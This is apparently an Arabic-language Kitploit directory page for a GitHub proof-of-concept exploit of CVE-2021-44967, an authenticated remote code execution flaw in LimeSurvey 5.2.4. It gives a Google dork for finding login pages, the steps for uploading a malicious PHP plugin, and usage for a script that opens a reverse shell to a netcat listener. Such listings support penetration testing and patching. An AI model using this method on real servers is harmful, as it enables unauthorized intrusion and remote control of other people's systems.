Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-44967 — استغلال POC لـ CVE-2021-44967 | Kitploit
أدوات/GitHubGitHub/d3ext/cve-2021-44967
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubd3ext/cve-2021-44967

CVE-2021-44967

استغلال POC لـ CVE-2021-44967

عرض المستودع
6منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-44967

root@kitploit:~
# Exploit Title: LimeSurvey 5.2.4 - Authenticated Remote Code Execution (RCE)
# Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login
# Date: 05/12/2021
# Discovered by: Y1LD1R1M
# Exploit Author: D3Ext
# Vendor Homepage: https://www.limesurvey.org/
# Software Link: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip
# Version: 5.2.x
# Tested on: Kali Linux 2025
# CVE: CVE-2021-44967

الشرح

توجد ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) في LimeSurvey 5.2.4 عبر وظيفة رفع وتثبيت الإضافات، والتي قد تسمح لمستخدم ضار عن بُعد برفع ملف كود PHP عشوائي.

هذه هي الخطوات التي يجب اتباعها لاستغلال هذه الثغرة يدويًا:

  1. أنشئ ملف ZIP يحتوي على ملف PHP وملف الإعدادات
  2. سجّل الدخول إلى LimeSurvey
  3. انتقل إلى الإعدادات -> الإضافات -> الرفع والتثبيت
  4. ارفع ملف ZIP الخاص بك
  5. قم بتثبيته
  6. أخيرًا، قم بتفعيل الإضافة
  7. عندها سيكون كود PHP الخاص بك متاحًا تحت /upload/plugins/<plugin_name>/<php_file>

الاستخدام

root@kitploit:~
usage: CVE-2021-44967.py [-h] --url URL --user USER --password PASSWORD --lhost LHOST --lport LPORT [--verbose]

CVE-2021-44967 - LimeSurvey Authenticated RCE

options:
  -h, --help           show this help message and exit
  --url URL            URL of the LimeSurvey web root
  --user USER          username to log in
  --password PASSWORD  password of the username
  --lhost LHOST        local host to receive the reverse shell
  --lport LPORT        local port to receive the reverse shell
  --verbose            enable verbose

ابدأ مستمع netcat ثم نفّذ الاستغلال على النحو التالي:

root@kitploit:~
python3 --url <URL> --user <username> --password <password> --lhost <local host> --lport <local port>

العرض التوضيحي

المراجع

root@kitploit:~
https://github.com/Y1LD1R1M-1337/Limesurvey-RCE
https://www.exploit-db.com/exploits/50573
https://github.com/p0dalirius/LimeSurvey-webshell-plugin
https://ine.com/blog/cve-2021-44967-limesurvey-rce
https://pentest-tools.com/vulnerabilities-exploits/limesurvey-524-rce-vulnerability_13029

الترخيص

هذا المشروع مرخّص بموجب رخصة MIT

حقوق النشر © 2025، D3Ext

تنزيل الأداة